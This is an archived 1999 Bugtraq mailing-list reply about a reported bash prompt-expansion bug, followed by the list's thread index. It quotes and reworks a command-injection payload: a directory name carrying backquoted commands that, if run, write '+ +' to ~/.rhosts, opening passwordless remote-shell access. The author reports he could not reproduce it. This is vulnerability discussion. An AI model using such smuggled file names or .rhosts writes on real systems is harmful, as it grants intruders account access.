Bugtraq mailing list archives
Re: Bash Bug
From: pcg () GOOF COM (Marc Lehmann)
Date: Thu, 22 Apr 1999 03:18:48 +0200
On Tue, Apr 20, 1999 at 09:25:47PM -0400, Shadow wrote:
If a user creates a directory with a command like mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
It seems to me that this is related to the prompt string parsing. If yes, then bash is not vulnerable unless configured to display the current directory (correct me if the root of the problem is different). Some additional notes: - I was unable to reproduce this on my system, even when bash is configured to display the current path in the prompt. (bash 2.02.1(1)) - The original example seemed to have too much whitespace. I used: mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\`" - PS1 was set to \h:\w\$ HTH -- -----==- | ----==-- _ | ---==---(_)__ __ ____ __ Marc Lehmann +-- --==---/ / _ \/ // /\ \/ / pcg () goof com |e| -=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE --+ The choice of a GNU generation | |
Current thread:
- Re: Plain text passwords--necessary, (continued)
- Re: Plain text passwords--necessary Phillip Vandry (Apr 19)
- Corrected Linux 2.2.5 FIN/NULL/XMAS block patch Taral (Apr 19)
- Re: Corrected Linux 2.2.5 FIN/NULL/XMAS block patch Taral (Apr 20)
- Re: Plain text passwords--necessary Taral (Apr 19)
- Re: Plain text passwords--necessary Phillip Vandry (Apr 19)
- Re: Plain text passwords--necessary Trevor Schroeder (Apr 19)
- bug in ssh allowing to be invissible Grzegorz Stelmaszek (Apr 19)
- Re: bug in ssh allowing to be invissible Pete (Apr 20)
- Re: bug in ssh allowing to be invissible Joe Gross (Apr 20)
- NetBSD Security Advisory 1999-009 matthew green (Apr 20)
- Bash Bug Shadow (Apr 20)
- Re: Bash Bug Marc Lehmann (Apr 21)
- Re: Bash Bug Pavel Kankovsky (Apr 22)
- Re: Bash Bug Chet Ramey (Apr 22)
- L0pht Security Advisory: Cold Fusion App Server Weld Pond (Apr 21)
- Re: Plain text passwords--necessary Densin Roy. (Apr 19)
- Re: Plain text passwords--necessary Daniel Alex Finkelstein (Apr 19)
- AOL Instant Messenger URL Crash Adam Brown (Apr 19)
- Re: AOL Instant Messenger URL Crash Daniel Reed (Apr 20)
- Shopping Carts exposing CC data Joe (Apr 19)
- Re: Shopping Carts exposing CC data Joe (Apr 20)
- Outlook 98 allows spoofing internal users Nate Lawson (Apr 20)